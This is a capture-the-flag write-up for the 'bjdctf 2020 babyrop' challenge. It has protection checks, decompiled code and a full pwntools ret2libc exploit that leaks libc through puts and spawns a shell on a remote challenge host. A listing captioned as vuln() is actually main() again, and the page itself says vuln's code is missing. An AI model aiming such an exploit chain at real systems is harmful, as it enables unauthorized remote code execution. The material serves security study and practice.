# bjdctf 2020 babyrop
# 前提
# 查看文件保护
[*] '/root/pwn/buuctf/bjdctf_2020_babyrop/bjdctf_2020_babyrop'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
# 静态分析
主函数如下
// Decompiler (IDA-style) pseudo-code of the binary's entry point.
// main() has no logic of its own: it runs init() and then vuln().
int __cdecl main(int argc, const char **argv, const char **envp)
{
init();   // presumably stdio/buffer setup; its body is not shown on this page
vuln();   // contains the stack overflow the exploit targets (see the analysis below)
return 0;
}
vuln 函数及函数表如下（注意：下方贴出的仍是 main 的反编译结果，vuln 本身的反编译代码在本页缺失；溢出缓冲区到返回地址的距离需结合 vuln 的反汇编自行核对，exp 中的 padding 即由此得出）
// NOTE(review): this listing is main() again, not vuln() as the text above
// says. It differs from the first listing only in that the decompiler shows
// init() receiving main's (argc, argv, envp); likely the same function.
int __cdecl main(int argc, const char **argv, const char **envp)
{
init(argc, argv, envp);   // setup; body not shown on this page
vuln();                   // the overflow lives here; its decompilation is missing from the page
return 0;
}
# 思路分析
目前信息:
- vuln 函数内有明显的栈溢出漏洞，且程序没有 canary，覆盖返回地址不会被检测
- No PIE：程序固定加载在 0x400000，plt / got / gadget 地址可以直接硬编码使用
- NX 保护开启：栈不可执行，不能通过注入 shellcode 获取 shell
- 无后门函数，需要借助 libc 中的 system
思路:
- 本题是标准的 ret2libc：先用 puts@plt 打印 __libc_start_main 的 GOT 项泄漏 libc 地址，据此确定远程 libc 版本并计算 libc 基址，再求出 system 和 "/bin/sh" 字符串的地址构造第二段 payload，执行后获取 shell。
- 第一段 payload 在 puts 之后要把返回地址设回 vuln，程序才会再次读入输入、触发第二次溢出。
# exp
from pwn import *
from LibcSearcher import *
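# Classic amd64 ret2libc (NX on, no canary, no PIE, no backdoor function):
#   1. overflow vuln()'s stack buffer and return into puts@plt with
#      rdi = GOT entry of __libc_start_main to leak a libc pointer, then
#      return into vuln() again so we get a second read;
#   2. identify the remote libc from the leak, compute system / "/bin/sh",
#      and overflow a second time to call system("/bin/sh").
context(os='linux', arch='amd64', log_level='debug')

pwnfile = '/root/pwn/buuctf/bjdctf_2020_babyrop/bjdctf_2020_babyrop'
# Remote instance by default (as in the original); `python exp.py LOCAL`
# runs the binary locally for debugging.
io = process(pwnfile) if args.LOCAL else remote('node4.buuoj.cn', 28461)
elf = ELF(pwnfile)

# Bytes from the start of the overflowed buffer up to the saved return
# address. On amd64 the saved rbp is 8 bytes, so this is
# <buffer-to-rbp distance> + 8. The original wrote it as 0x24+4 (same
# value, 0x28, but reads like 32-bit arithmetic).
# NOTE(review): confirm the buffer offset in vuln()'s disassembly before
# reusing this constant.
padding = 0x28

# __libc_start_main@got already holds the resolved libc pointer: _start
# called it before main ran, so lazy binding has filled the slot in.
libc_start_main_got = elf.got['__libc_start_main']
puts_plt = elf.plt['puts']
vuln_addr = elf.symbols['vuln']
# `pop rdi; ret` gadget inside the binary; fixed because PIE is off.
pop_rdi_ret = 0x400733
# If system() faults on a `movaps` (rsp misaligned by 8) add a bare `ret`
# before it in stage 2: `pop rdi` is a single 0x5f byte, so the `ret` that
# follows it sits at pop_rdi_ret + 1.

# Stage 1: puts(__libc_start_main@got); then return into vuln() so the
# program reads our second payload.
payload = flat([b'a' * padding, pop_rdi_ret, libc_start_main_got, puts_plt, vuln_addr])
io.sendlineafter(b'me u story!\n', payload)

# puts() prints the 6 significant bytes of the pointer (top two bytes of a
# user-space address are zero) followed by '\n'. recvn() blocks until all
# 6 bytes arrive; recv(6) may return fewer on a short read and silently
# corrupt the leak.
leak = u64(io.recvn(6).ljust(8, b'\x00'))
log.info(f'__libc_start_main @ {leak:#x}')
if leak >> 40 != 0x7f:
    # Shared libraries on x86-64 Linux normally map at 0x7f.......... ;
    # anything else usually means we consumed the wrong bytes.
    log.warning('leak does not look like a libc address - check what was received before it')

# LibcSearcher matches on the low 12 bits of the leak and may list several
# candidate libcs; picking the wrong one yields wrong offsets (a segfault
# instead of a shell). Verify against a second leaked symbol if unsure.
libc = LibcSearcher('__libc_start_main', leak)
libcbase = leak - libc.dump('__libc_start_main')
system_addr = libcbase + libc.dump('system')
bin_sh_addr = libcbase + libc.dump('str_bin_sh')
log.info(f'libc base @ {libcbase:#x}')

# Stage 2: system("/bin/sh").
payload = flat([b'a' * padding, pop_rdi_ret, bin_sh_addr, system_addr])
io.sendlineafter(b'u story!\n', payload)
io.interactive()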